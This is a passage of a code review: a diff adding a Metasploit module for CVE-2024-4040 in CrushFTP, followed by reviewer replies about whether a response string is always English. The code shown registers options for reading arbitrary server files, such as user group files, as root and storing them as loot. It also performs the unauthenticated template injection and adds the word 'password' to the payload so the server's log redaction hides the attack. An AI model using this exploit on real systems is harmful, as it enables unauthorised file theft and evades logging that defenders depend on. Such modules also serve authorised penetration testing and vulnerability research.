modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.rb

```diff
@@ -0,0 +1,157 @@
+          authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The
+          primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote
+          code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'remmons-r7', # MSF Module & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2024-4040'],
+          ['URL', 'https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          # The CrushFTP.log file will contain a log of the HTTP requests
+          # Similarly, files in logs/session_logs/ will contain a log of the HTTP requests
+          # The sessions.obj file will temporarily persist details of recent requests
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        Opt::RHOST('0.0.0.0'),
+        OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true]),
+        OptString.new('TARGETFILE', [true, 'The target file to read. This can be a full path, a relative path, or a network share path (if firewalls permit)', 'users/MainUsers/groups.XML']),
+      ]
+    )
+  end
+
+  def check
+    # Unauthenticated requests to WebInterface endpoints should receive a response containing an 'anonymous' user session cookie
+    res_anonymous_check = get_anon_session
+
+    return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res_anonymous_check
+
+    # Confirm that the response returned a CrushAuth cookie and the status code was 404
+    if (res_anonymous_check.code != 404) || !res_anonymous_check.get_cookies.include?('CrushAuth')
+      return Msf::Exploit::CheckCode::Unknown('The application did not return a 404 response that provided an anonymous session cookie')
+    end
+
+    # Extract the CrushAuth anonymous session cookie value using regex
+    crushauth_cookie = res_anonymous_check&.get_cookies&.match(/\d{13}_[A-Za-z0-9]{30}/)
+
+    # The string "password" is included to invoke CrushFTP's sensitive parameter redaction in logs. The injection will be logged as "********"
+    # NOTE: Due to an apparent bug in the way CrushFTP redacts data, if file paths contain ":", some of the injection will be leaked in logs
+    res_template_inject = perform_template_injection('{user_name}password', crushauth_cookie)
+
+    return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res_template_inject
+
+    # Confirm that the "{user_name}" template injection evaluates to "anonymous" in the response
+    unless res_template_inject.body.include?('You need upload permissions to zip a file:anonymous')
```

Comment:
Just confirming; will this always be an english string? 👀

Reply:
That's a great question I hadn't considered. I'll see how many language options the software implements and confirm it works for all of them.

Reply:
The API response text language doesn't appear to be able to be changed, so we should be all good on this.